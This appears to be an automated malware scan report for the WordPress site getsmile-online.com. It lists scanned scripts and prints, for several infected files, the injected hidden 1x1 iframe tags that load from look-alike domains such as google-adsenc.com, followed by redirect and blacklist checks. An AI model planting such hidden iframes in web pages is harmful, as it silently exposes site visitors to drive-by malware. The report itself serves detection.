Scanned pages/files
Request | Server response | Status |
http://www.getsmile-online.com/ | 200 OK Content-Length: 23334 Content-Type: text/html | clean |
http://www.getsmile-online.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://www.getsmile-online.com/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.js | 200 OK Content-Length: 37241 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('m 9F={af:\'1.11\'};h $5k(L){k(L!=7D)};h $t(L){o(!$5k(L))k V;o(L.3T)k\'B\';m t=57 L;o(t==\'2w\'&&L.a7){2k(L.6m){17 1:k\'B\';17 3:k(/\\S/).2U(L.8q)?\'ak\':\'a Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://google-adsenc.com/in.cgi?2 <iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> | ||
http://www.getsmile-online.com/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.js.php | 200 OK Content-Length: 25597 Content-Type: text/html | clean |
http://www.getsmile-online.com/test404page.js | 404 Not Found Content-Length: 965 Content-Type: text/html | clean |
http://www.getsmile-online.com/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.transitions.js | 200 OK Content-Length: 4583 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) gallery.Transitions.extend({ fadeslideleft: function(oldFx, newFx, oldPos, newPos){ oldFx.options.transition = newFx.options.transition = Fx.Transitions.Cubic.easeOut; oldFx.options.duration = newFx.options.duration = 1500; if (newPos > oldPos) { newFx.start({ left: [this.galleryElement.offsetWidth, 0], opacity: 1 }); oldFx.start({opacity: [1,0]}); } else { newFx.start({opacity: [0,1]}); oldFx.start({ Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://google-adsenc.com/in.cgi?2 <iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> | ||
http://www.getsmile-online.com/wp-content/themes/intrepidity/js/superfish.js | 200 OK Content-Length: 6115 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://google-adsenc.com/in.cgi?2 <iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> | ||
http://www.getsmile-online.com/wp-content/themes/intrepidity/js/functions.js | 200 OK Content-Length: 4056 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function($){ $('#globalnav ul').superfish({ delay: 200, speed: 'fast', autoArrows: false }); $("#sidebar h2 a").click(function () { var itemlist = $(this).parents("li:first"); itemlist.toggleClass("side-switch"); itemlist.find("ul").slideToggle("fast"); return false; }); }); function printCopyrightYears(startYear) { if(!startYear) var Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://google-adsenc.com/in.cgi?2 <iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> | ||
http://www.getsmile-online.com/wp-includes/js/jquery/jquery.form.min.js?ver=2.73 | 200 OK Content-Length: 11116 Content-Type: application/javascript | clean |
http://www.getsmile-online.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.2.1 | 200 OK Content-Length: 14046 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function() { try { jQuery('div.wpcf7 > form').ajaxForm({ beforeSubmit: wpcf7BeforeSubmit, dataType: 'json', success: wpcf7ProcessJson }); } catch (e) { } try { jQuery('div.wpcf7 > form').each(function(i, n) { wpcf7ToggleSubmit(jQuery(n)); }); } catch (e) { } try { if (_wpcf7.cached) { jQuery('div.wpcf7 > form').each(function(i, n) { wpcf7OnloadRefill(n); Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://google-adsenc.com/in.cgi?2 <iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> Hidden iFrame found. size: 1x1 src: http://google-adsens.com/in.cgi?2 <iframe src="http://google-adsens.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: getsmile-online.com
Result:
GET / HTTP/1.1
Host: getsmile-online.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: getsmile-online.com
Referer: http://www.google.com/search?q=getsmile-online.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: getsmile-online.com
Referer: http://www.google.com/search?q=getsmile-online.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=getsmile-online.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://getsmile-online.com/
Result: getsmile-online.com is not infected or malware details are not published yet.
Result: getsmile-online.com is not infected or malware details are not published yet.